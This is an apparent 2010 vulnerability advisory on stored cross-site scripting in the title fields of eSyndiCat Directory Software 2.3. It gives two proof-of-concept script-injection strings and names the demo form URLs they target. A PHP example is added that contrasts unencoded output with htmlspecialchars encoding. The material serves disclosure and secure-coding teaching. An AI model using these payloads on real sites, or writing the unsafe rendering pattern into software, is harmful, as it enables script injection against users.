------------------------------------------------------------------------- 
eSyndiCat Directory Software 2.3 - Cross-Site Scripting (XSS)

http://www.esyndicat.com/ 
 
25 - 11 - 2010  
 
Avram Marius ( d3v1l )  
 
http://twitter.com/securityshell  -  http://security-sh3ll.blogspot.com

--------------------------------------------------------------------------
PoC: 1
 
http://www.esyndicat.com/demo/suggest-category.php?id=364
 
On the Suggest Category form, enter something like "><script>alert('XSS')</script> in the Category title field.
 

Screenshot:
 
http://twitpic.com/3aq5q8 
 
--------------------------------------------------------------------------
 
PoC: 2

http://www.esyndicat.com/demo/suggest-listing.php?id=0 

On the Suggest Listing form, the Title field can be set to "><script>alert('XSS')</script>

 
Screenshot:

http://twitpic.com/3aq7s0
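
Added example (not eSyndiCat code and not part of the original advisory): both PoC strings begin with ">, which suggests the title is written into a double-quoted HTML attribute. Assuming that, the PHP sketch below contrasts an unencoded render with one encoded at output time; the function names and the input markup are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not taken from eSyndiCat.
// Assumption: the submitted title is echoed into a double-quoted
// value="" attribute, which is why the PoC string starts with ">.

// Vulnerable pattern: the raw title is concatenated into the markup,
// so a double quote in the input ends the attribute value.
function render_title_unsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '">';
}

// Hardened pattern: encode for the HTML context when writing output.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
// byte sequences instead of making the function return an empty string.
function render_title_safe(string $title): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $encoded . '">';
}

// The title value used in both PoCs of the advisory.
$poc = '"><script>alert(\'XSS\')</script>';

$rendered = [
    'unsafe' => render_title_unsafe($poc),
    'safe'   => render_title_safe($poc),
];

// Report whether a literal script tag survives in each rendering.
foreach ($rendered as $label => $html) {
    $state = stripos($html, '<script') !== false
        ? 'script tag present in markup'
        : 'no script tag in markup';
    printf("%-6s : %s\n         %s\n", $label, $state, $html);
}
```

The same encoding has to be applied at every place the title is written into a page, not only on the form that accepted it.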

--------------------------------------------------------------------------